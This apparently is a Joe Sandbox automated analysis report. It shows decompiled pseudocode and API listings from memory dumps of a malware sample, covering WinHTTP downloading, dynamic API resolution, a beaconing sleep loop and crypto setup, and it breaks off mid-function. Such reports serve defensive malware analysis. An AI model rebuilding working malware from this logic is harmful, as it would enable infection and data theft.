    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 37%
    			E003B167E(void* __ebx, long __edi, void* __esi) {
    				void* _t15;
    				intOrPtr _t18;
    				void* _t19;
    				intOrPtr _t20;
    				void* _t22;
    				long _t29;
    				void* _t31;
    				void* _t33;
    				void* _t35;
    
    				_t31 = __esi;
    				_t29 = __edi;
    				_t22 = __ebx;
    				while(1) {
    					 *((intOrPtr*)(_t33 - 4)) = 0;
    					_t15 = _t33 - 4;
    					__imp__WinHttpQueryDataAvailable( *((intOrPtr*)(_t22 + 0xc)), _t15); // executed
    					if(_t15 == 0) {
    						break;
    					}
    					_t18 =  *((intOrPtr*)(_t33 - 4));
    					if(_t18 == 0) {
    						L9:
    						 *((intOrPtr*)(_t33 - 8)) = 1;
    					} else {
    						_t29 = _t29 + _t18;
    						if(_t31 == 0) {
    							_t19 = E003A1D90(_t29, 0);
    							_t35 = _t35 + 8;
    							_t31 = _t19;
    						} else {
    							_t20 = E003A1D90(_t29, _t31); // executed
    							_t31 = _t20;
    							_t35 = _t35 + 8;
    							_t19 = _t20 -  *((intOrPtr*)(_t33 - 4)) + _t29;
    						}
    						__imp__WinHttpReadData( *((intOrPtr*)(_t22 + 0xc)), _t19,  *((intOrPtr*)(_t33 - 4)), _t33 - 0xc);
    						if(_t19 != 0) {
    							if( *((intOrPtr*)(_t33 - 4)) > 0) {
    								continue;
    							} else {
    								goto L9;
    							}
    						}
    					}
    					break;
    				}
    				 *((intOrPtr*)( *((intOrPtr*)(_t33 + 8)))) = _t31;
    				 *((intOrPtr*)( *((intOrPtr*)(_t33 + 0xc)))) = _t29;
    				return  *((intOrPtr*)(_t33 - 8));
    			}

    APIs
    • WinHttpQueryDataAvailable.WINHTTP(?,?,00000000,00000000,00000001,?,?,?,?,00000000), ref: 003B168D
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    • WinHttpReadData.WINHTTP(?,00000000,?,?), ref: 003B16D1
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 37%
    			E00397FC0(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
    				void* __edi;
    				void* _t12;
    				intOrPtr _t15;
    				void* _t25;
    
    				_t25 = __ecx;
    				_t2 = _t25 + 0x78; // 0x78
    				_t4 = _t25 + 0x74; // 0x74
    				_t12 = E003968A0(__ecx, 0, _a4, _a8, _a12, _t4, _t2); // executed
    				if(_t12 == 0 || E003A1870(__ecx) == 0) {
    					return 0;
    				} else {
    					_t15 =  *((intOrPtr*)(__ecx + 0x10));
    					if(_t15 != 0) {
    						__imp__#6(_t15);
    					}
    					__imp__#2(_a16);
    					 *((intOrPtr*)(_t25 + 0x10)) = _t15;
    					 *((intOrPtr*)(_t25 + 0x64)) = 1;
    					return 1;
    				}
    			}

    APIs
      • Part of subcall function 003968A0: memcpy.MSVCRT ref: 00396998
    • SysFreeString.OLEAUT32(?), ref: 00397FFB
    • SysAllocString.OLEAUT32(0039EF86), ref: 00398005
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 100%
    			E0039F250(void* __eflags, struct HINSTANCE__* _a4) {
    				short _v204;
    				char _v464;
    				_Unknown_base(*)()* _t14;
    				intOrPtr* _t17;
    				_Unknown_base(*)()** _t23;
    				intOrPtr _t24;
    				void* _t25;
    				void* _t26;
    
    				_t17 = _a4;
    				E00399090(__eflags,  &_v204,  *_t17);
    				_t26 = _t25 + 8;
    				_t14 = LoadLibraryW( &_v204);
    				_t4 = _t17 + 0xc; // 0xcccccccc
    				_t5 = _t17 + 4; // 0x754f10c6
    				_t24 =  *_t5;
    				_t23 =  *_t4 +  *0x3b8628;
    				_a4 = _t14;
    				_t7 = _t17 + 8; // 0xc35e5ff1
    				if(_t24 <=  *_t7) {
    					do {
    						E00396CB0( &_v464, _t24);
    						_t26 = _t26 + 8;
    						_t14 = GetProcAddress(_a4,  &_v464);
    						 *_t23 = _t14;
    						_t24 = _t24 + 1;
    						_t23 = _t23 + 4;
    						_t11 = _t17 + 8; // 0xc35e5ff1
    					} while (_t24 <=  *_t11);
    				}
    				return _t14;
    			}

    APIs
    • LoadLibraryW.KERNEL32(?), ref: 0039F278
    • GetProcAddress.KERNEL32(00393E17,?), ref: 0039F2AD
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 100%
    			E003B08A0(intOrPtr _a4) {
    				intOrPtr _t6;
    				intOrPtr _t14;
    				intOrPtr _t16;
    
    				_t16 = _a4;
    				L1:
    				_t6 =  *0x3b8628; // 0x593938
    				 *((intOrPtr*)( *((intOrPtr*)(_t6 + 0xac))))(0x3b8594);
    				_t12 =  *((intOrPtr*)(_t16 + 4));
    				if( *( *((intOrPtr*)(_t16 + 4))) > 0) {
    					E0039A590(_t12, _t16);
    				}
    				_t14 =  *0x3b8628; // 0x593938
    				 *((intOrPtr*)( *((intOrPtr*)(_t14 + 0xc4))))(0x3b8594);
    				Sleep(0x3e8); // executed
    				goto L1;
    			}

    APIs
    • Sleep.KERNELBASE(000003E8), ref: 003B08F4
      • Part of subcall function 0039A590: _time64.MSVCRT ref: 0039A85C
      • Part of subcall function 0039A590: CreateThread.KERNEL32(00000000,00000000,Function_000044B0,00000000,00000000,?), ref: 0039A8CA
      • Part of subcall function 0039A590: _time64.MSVCRT ref: 0039A8EE
      • Part of subcall function 0039A590: _time64.MSVCRT ref: 0039A9CE
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    APIs
    • CoInitializeEx.OLE32(00000000,00000000), ref: 0039BAF4
    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0039BB13
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 100%
    			E003B08A9() {
    				intOrPtr _t5;
    				intOrPtr _t13;
    				intOrPtr _t15;
    
    				L1:
    				_t5 =  *0x3b8628; // 0x593938
    				 *((intOrPtr*)( *((intOrPtr*)(_t5 + 0xac))))(0x3b8594);
    				_t11 =  *((intOrPtr*)(_t15 + 4));
    				if( *( *((intOrPtr*)(_t15 + 4))) > 0) {
    					E0039A590(_t11, _t15);
    				}
    				_t13 =  *0x3b8628; // 0x593938
    				 *((intOrPtr*)( *((intOrPtr*)(_t13 + 0xc4))))(0x3b8594);
    				Sleep(0x3e8); // executed
    				goto L1;
    			}






    APIs
    • Sleep.KERNELBASE(000003E8), ref: 003B08F4
      • Part of subcall function 0039A590: _time64.MSVCRT ref: 0039A85C
      • Part of subcall function 0039A590: CreateThread.KERNEL32(00000000,00000000,Function_000044B0,00000000,00000000,?), ref: 0039A8CA
      • Part of subcall function 0039A590: _time64.MSVCRT ref: 0039A8EE
      • Part of subcall function 0039A590: _time64.MSVCRT ref: 0039A9CE
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 95%
    			E00398F40(intOrPtr __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
    				intOrPtr _v8;
    				void* __ebx;
    				void* __edi;
    				void* _t11;
    				intOrPtr _t13;
    				void* _t20;
    				void* _t22;
    				void* _t39;
    				intOrPtr _t41;
    				intOrPtr _t48;
    				void* _t51;
    
    				_t39 = __edx;
    				_push(__ecx);
    				_t25 = _a4;
    				_t41 = __ecx;
    				_v8 = 0;
    				if(E0039CA00(__ecx, __eflags, _a4) != 0) {
    					L13:
    					return 0;
    				} else {
    					_t11 = E0039D7E0(_t25);
    					_t27 = _t11;
    					if(_t11 == 0) {
    						goto L13;
    					} else {
    						_t57 = _a8;
    						if(_a8 == 0) {
    							L5:
    							_t13 = E0039EE40(_t41, _t39, _t59, _t27, _a12); // executed
    							_t48 = _t13;
    							if(_t48 != 0) {
    								goto L9;
    							} else {
    								_t61 = _a8 - _t13;
    								if(_a8 != _t13) {
    									goto L12;
    								} else {
    									_t20 = E0039F5D0(_t61, _t27);
    									_t62 = _t20;
    									if(_t20 == 0) {
    										goto L12;
    									} else {
    										_t48 = E00391BE0(_t41, _t62, _t27);
    										if(_t48 == 0) {
    											goto L12;
    										} else {
    											goto L9;
    										}
    									}
    								}
    							}
    						} else {
    							_t22 = E0039F5D0(_t57, _t27); // executed
    							_t58 = _t22;
    							if(_t22 == 0) {
    								goto L5;
    							} else {
    								_t48 = E00391BE0(_t41, _t58, _t27);
    								_t59 = _t48;
    								if(_t48 != 0) {
    									L9:
    									 *((intOrPtr*)(_t48 + 0x44)) = _t41;
    									if(E0039D6E0(_t41, _t48) == 0) {
    										E00397A20(_t27, _t48, _t41);
    										_push(_t48);
    										L00391CB0();
    										_t51 = _t51 + 4;
    										L12:
    										E0039BB40(_t27);
    										return _v8;
    									} else {
    										_v8 = _t48;
    										E0039BB40(_t27);
    										return _t48;
    									}
    								} else {
    									goto L5;
    								}
    							}
    						}
    					}
    				}
    			}














    APIs
      • Part of subcall function 0039EE40: ??2@YAPAXI@Z.MSVCRT ref: 0039EF57
      • Part of subcall function 0039EE40: ??3@YAXPAX@Z.MSVCRT ref: 0039EF96
      • Part of subcall function 0039EE40: ??3@YAXPAX@Z.MSVCRT ref: 0039F02B
      • Part of subcall function 00397A20: SysFreeString.OLEAUT32(?), ref: 00397A3C
    • ??3@YAXPAX@Z.MSVCRT ref: 00398FEF
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
      • Part of subcall function 0039F5D0: GetFileAttributesW.KERNELBASE(00000000,00000000,00000001,00000000,?,00398FAF,00000000,00000000,00398A9D,00000000,00000000,00000000,00000000,?,00000001), ref: 0039F5F3
      • Part of subcall function 00391BE0: ??2@YAPAXI@Z.MSVCRT ref: 00391C02
      • Part of subcall function 00391BE0: ??3@YAXPAX@Z.MSVCRT ref: 00391C4A
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 64%
    			E00396E80(intOrPtr __ecx) {
    				char _v8;
    				char _v208;
    				intOrPtr _t21;
    				void* _t28;
    				void* _t41;
    				intOrPtr _t42;
    				void* _t43;
    
    				_t42 = __ecx;
    				_t2 = _t42 + 0x4fc; // 0x4fc
    				_t41 = _t2;
    				_v8 = 0;
    				if( *((intOrPtr*)(__ecx + 0x504)) == 0 ||  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t41 + 8)))) + 0x20))))() == 0 || E0039EA90(__ecx) == 0) {
    					__eflags = 0;
    					return 0;
    				} else {
    					_t21 =  *((intOrPtr*)(__ecx + 0x40));
    					__imp___wtoi(_t21);
    					if(_t21 != 1) {
    						E00399090(__eflags,  &_v208, 0x2c);
    						_push( *((intOrPtr*)(_t42 + 0x38)));
    						_push( *((intOrPtr*)(_t42 + 0x50)));
    						_push( *((intOrPtr*)(_t42 + 0x40)));
    						_push( *((intOrPtr*)(_t42 + 0x14)));
    						_t43 = E00391720(_t42,  &_v208,  *((intOrPtr*)(_t42 + 0x18)));
    						__eflags = _t43;
    						if(_t43 == 0) {
    							L7:
    							_v8 = 0;
    						} else {
    							_t28 = E00398800(_t41, _t43,  &_v8); // executed
    							__eflags = _t28;
    							if(_t28 == 0) {
    								goto L7;
    							}
    						}
    						__eflags = _t43;
    						if(_t43 != 0) {
    							E0039BB40(_t43);
    						}
    						return _v8;
    					} else {
    						return 0xc8;
    					}
    				}
    			}










    APIs
      • Part of subcall function 0039EA90: rand.MSVCRT ref: 0039EAB3
      • Part of subcall function 0039EA90: rand.MSVCRT ref: 0039EAE6
    • _wtoi.MSVCRT ref: 00396ECC
      • Part of subcall function 00391720: _vsnwprintf.MSVCRT ref: 00391747
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 100%
    			E00391720(wchar_t* _a8, void _a12) {
    				wchar_t* _t5;
    				int _t8;
    				wchar_t* _t11;
    				wchar_t* _t14;
    				void* _t21;
    
    				_t5 = E003A1D90(0x800, 0); // executed
    				_t14 = _t5;
    				if(_t14 == 0) {
    					L6:
    					return 0;
    				}
    				_t8 = _vsnwprintf(_t14, 0x3ff, _a8,  &_a12);
    				if(_t8 < 0) {
    					L5:
    					_t14[0x3ff] = 0;
    					E0039BB40(_t14);
    					goto L6;
    				}
    				_t21 = _t8 - 0x3ff;
    				if(_t21 > 0) {
    					goto L5;
    				}
    				_t11 = _t14;
    				if(_t21 != 0) {
    					return _t11;
    				} else {
    					_t14[0x3ff] = 0;
    					return _t11;
    				}
    			}








    APIs
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    • _vsnwprintf.MSVCRT ref: 00391747
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 37%
    			E003B1D30(intOrPtr* __ecx) {
    				char _v724;
    				intOrPtr _t10;
    				intOrPtr* _t16;
    
    				_t16 = __ecx;
    				 *__ecx = 0x3b3398;
    				 *((intOrPtr*)(__ecx + 8)) = 0;
    				 *((intOrPtr*)(__ecx + 0xc)) = 0;
    				 *((intOrPtr*)(__ecx + 0x10)) = 0;
    				 *((intOrPtr*)(__ecx + 0x14)) = 0;
    				 *((short*)(__ecx + 0x18)) = 0;
    				_t10 = E00399090(0,  &_v724, 0x49);
    				__imp__WinHttpOpen( &_v724, 0, 0, 0, 0); // executed
    				 *((intOrPtr*)(_t16 + 4)) = _t10;
    				return _t16;
    			}






    APIs
    • WinHttpOpen.WINHTTP(?,00000000,00000000,00000000,00000000,00000000,?), ref: 003B1D73
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 37%
    			E003B2403() {
    				intOrPtr _t1;
    				WCHAR* _t2;
    
    				_t1 =  *0x3b8980; // 0x0
    				_push(0x3b8654);
    				_push( *0x3b897c);
    				 *0x3b8654 = _t1;
    				_push(0x3b8644);
    				_push(0x3b8648);
    				_push(0x3b8640); // executed
    				_t2 = GetEnvironmentStringsW(); // executed
    				 *0x3b8650 = _t2;
    				return _t2;
    			}





    APIs
    • GetEnvironmentStringsW.KERNELBASE ref: 003B2427
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 97%
    			E003968A0(void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, void** _a16, signed int* _a20) {
    				int* _v8;
    				void* _v12;
    				char _v16;
    				int* _v20;
    				char _v24;
    				void* _t35;
    				void* _t44;
    				void* _t46;
    				void* _t49;
    				void* _t51;
    				void* _t60;
    				int* _t88;
    				intOrPtr _t90;
    				void* _t91;
    
    				_t60 = __ecx;
    				_t58 = _a12;
    				_t2 = _t60 + 8; // 0x8
    				_t89 = _t2;
    				_v12 = 0;
    				_v16 = 0;
    				_v8 = 0;
    				_v24 = 0;
    				_v20 = 0;
    				 *_t2 = _a4;
    				if(_a12 >= 0x30) {
    					_push(__edi);
    					_t35 = E00396040(_t89, _a8, _a8, 0x20,  &_v12); // executed
    					if(_t35 == 0) {
    						L10:
    						_t90 = _v20;
    						L11:
    						_t36 = _v12;
    						if(_v12 != 0) {
    							E0039BB40(_t36);
    							_t91 = _t91 + 4;
    						}
    						_t37 = _v16;
    						if(_v16 != 0) {
    							E0039BB40(_t37);
    							_t91 = _t91 + 4;
    						}
    						_t38 = _v8;
    						if(_v8 != 0) {
    							E0039BB40(_t38); // executed
    						}
    						return _t90;
    					}
    					_t44 = E00396040(_t89, _t85, _t85 + 0x10, 0x20,  &_v16); // executed
    					if(_t44 == 0) {
    						goto L10;
    					}
    					_t46 = E003976E0(_t85 + 0x30, _t58 + 0xffffffd0, _v12, _v16,  &_v8,  &_v24); // executed
    					if(_t46 == 0) {
    						goto L10;
    					}
    					_t88 = _v8;
    					_t47 =  *_t88;
    					_t19 =  &(_t88[2]); // 0x8
    					_t49 = E0039DAF0(_t89, _t88,  *_t88 + 8, _t19 + _t47, 0); // executed
    					if(_t49 == 0) {
    						goto L10;
    					}
    					_t50 = _t88[1];
    					if((_t88[1] & 0x00000001) == 0) {
    						_t51 = E003A1D90( *_t88, 0); // executed
    						_t91 = _t91 + 8;
    						 *_a16 = _t51;
    						if(_t51 == 0) {
    							goto L10;
    						}
    						memcpy(_t51,  &(_v8[2]),  *_t88);
    						_t91 = _t91 + 0xc;
    						 *_a20 =  *_t88;
    						_t90 = 1;
    						goto L11;
    					}
    					if(E00395900(_t89,  &(_v8[2]),  *_t88, _t50 >> 1, _a16) == 0) {
    						goto L10;
    					}
    					 *_a20 = _t88[1] >> 1;
    					_t90 = 1;
    					goto L11;
    				}
    				return 0;
    			}

















    APIs
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    • memcpy.MSVCRT ref: 00396998
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
      • Part of subcall function 003976E0: memcpy.MSVCRT ref: 003977B9
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 37%
    			E00391F00(void** __ecx, void* _a4, int _a8) {
    				void* _v8;
    				void* _v12;
    				void* _v16;
    				char _v216;
    				void* _t17;
    				void* _t18;
    				void* _t19;
    				void* _t25;
    				void* _t26;
    				void* _t27;
    				void* _t31;
    				void* _t32;
    				void** _t38;
    				int _t40;
    				void* _t41;
    				void* _t42;
    				intOrPtr _t45;
    
    				_t38 = __ecx;
    				_v8 = 0;
    				_v12 = 0;
    				_v16 = 0;
    				_t45 =  *0x3b85c0; // 0x1
    				if(_t45 != 0) {
    					_t17 =  *0x3b85d4( &_v8, 0x3b32c0, 0); // executed
    					__eflags = _t17;
    					if(__eflags >= 0) {
    						E00399090(__eflags,  &_v216, 0xbc);
    						_t32 = _a4;
    						_t42 = _t41 + 8;
    						_t40 = _a8;
    						_t25 =  *0x3b85e8(_v8, 0,  &_v216, 0,  &_v12, _t32, _t40, 0, _t31);
    						__eflags = _t25;
    						if(_t25 >= 0) {
    							_t26 =  *_t38;
    							__eflags = _t26;
    							if(_t26 != 0) {
    								E0039BB40(_t26);
    								_t42 = _t42 + 4;
    							}
    							_t27 = E003A1D90(_t40, 0);
    							 *_t38 = _t27;
    							__eflags = _t27;
    							if(_t27 != 0) {
    								memcpy(_t27, _t32, _t40);
    								_t38[1] = _t40;
    								_v16 = 1;
    							}
    						}
    					}
    					_t18 = _v12;
    					__eflags = _t18;
    					if(_t18 != 0) {
    						 *0x3b85cc(_t18, 0);
    					}
    					_t19 = _v8;
    					__eflags = _t19;
    					if(_t19 != 0) {
    						 *0x3b85b8(_t19);
    					}
    					return _v16;
    				} else {
    					return 0;
    				}
    			}




















    APIs
    • memcpy.MSVCRT ref: 00391F9C
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 100%
    			E0039BB40(void* _a4) {
    				void* _t2;
    				void* _t3;
    				int _t4;
    
    				_t2 = _a4;
    				if(_t2 != 0) {
    					_t3 =  *0x3b862c; // 0x290000
    					_t4 = HeapFree(_t3, 8, _t2); // executed
    					return _t4;
    				}
    				return _t2;
    			}






    APIs
    • HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd

    Non-executed Functions

    C-Code - Quality: 23%
    			E003AEF6B(void* _a4, int _a8, void* _a12, void* _a16, intOrPtr _a20, intOrPtr _a24) {
    				long* _v8;
    				void* _v12;
    				long* _v16;
    				int _v20;
    				signed int _t42;
    				void* _t48;
    				int _t51;
    				DWORD* _t67;
    				BYTE* _t71;
    				signed int _t78;
    				char _t82;
    				int _t84;
    				void* _t90;
    
    				_t78 = _a8;
    				_t42 = _t78 & 0x8000000f;
    				if(_t42 < 0) {
    					_t90 = (_t42 - 0x00000001 | 0xfffffff0) + 1;
    				}
    				if(_t90 != 0) {
    					L13:
    					return 0;
    				} else {
    					_t82 = 0x10;
    					if(_t78 < _t82) {
    						goto L13;
    					}
    					_v16 = 0;
    					if(CryptAcquireContextA( &_v16, 0, 0, 0x18, 0xf0000000) == 0) {
    						goto L13;
    					}
    					_t48 =  *0x3b8538(_t78 + _t78);
    					_v12 = _t48;
    					_t71 =  *0x3b8538(0x1c);
